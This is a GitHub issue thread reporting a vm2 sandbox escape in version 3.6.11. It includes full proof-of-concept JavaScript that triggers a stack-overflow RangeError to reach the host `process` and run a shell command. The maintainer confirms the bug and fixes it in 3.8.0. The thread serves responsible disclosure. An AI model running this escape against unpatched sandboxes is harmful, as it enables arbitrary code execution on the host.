### ISSUE TITLE
Breakout in v3.6.11

### ISSUE THREAD

**Issue by XmiliaH** [patriksimek/vm2#199]
It's still possible to break out via Maximum call stack size exceeded RangeError.
This code is quite unstable. Worked for me ~90% of the time. If it's not working for you, I will sit down and try to make a more stable version.
```JS
"use strict";
const {VM} = require('vm2');
const untrusted = `const ft = {
		length: 10,
		utf8Write(){
			
		}
}
function r(i){
	var x = 0;
	try{
		x = r(i);
	}catch(e){}
	if(typeof(x)!=='number')
		return x;
	if(x!==i)
		return x+1;
	try{
		Buffer.prototype.write.call(ft);
	}catch(e){
		return e;
	}
	return null;
}
RangeError.prototype.c = c=>c.constructor("return process")();
var i=1;
while(1){
	try{
		x = r(i);
		try{
			i=x.constructor.constructor("return process")().mainModule;
			break;
		}catch(x){
			i=x.c(Buffer.from);
			break;
		}
	}catch(x){
		i++;
	}
}
i.require("child_process").execSync("whoami").toString()`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x.stack);
}
```

**Comment by patriksimek** [comment]
@XmiliaH I was able to reproduce the issue and track what causes it. Can you please take a look at the latest commit and test, if that handles all the possibility of escaping through the `Max stack size` error? Thanks!

**Comment by patriksimek** [comment]
I've just released the fix in 3.8.0. Feel free to open a new issue in case you find more ways to break out of the sandbox. Thanks.
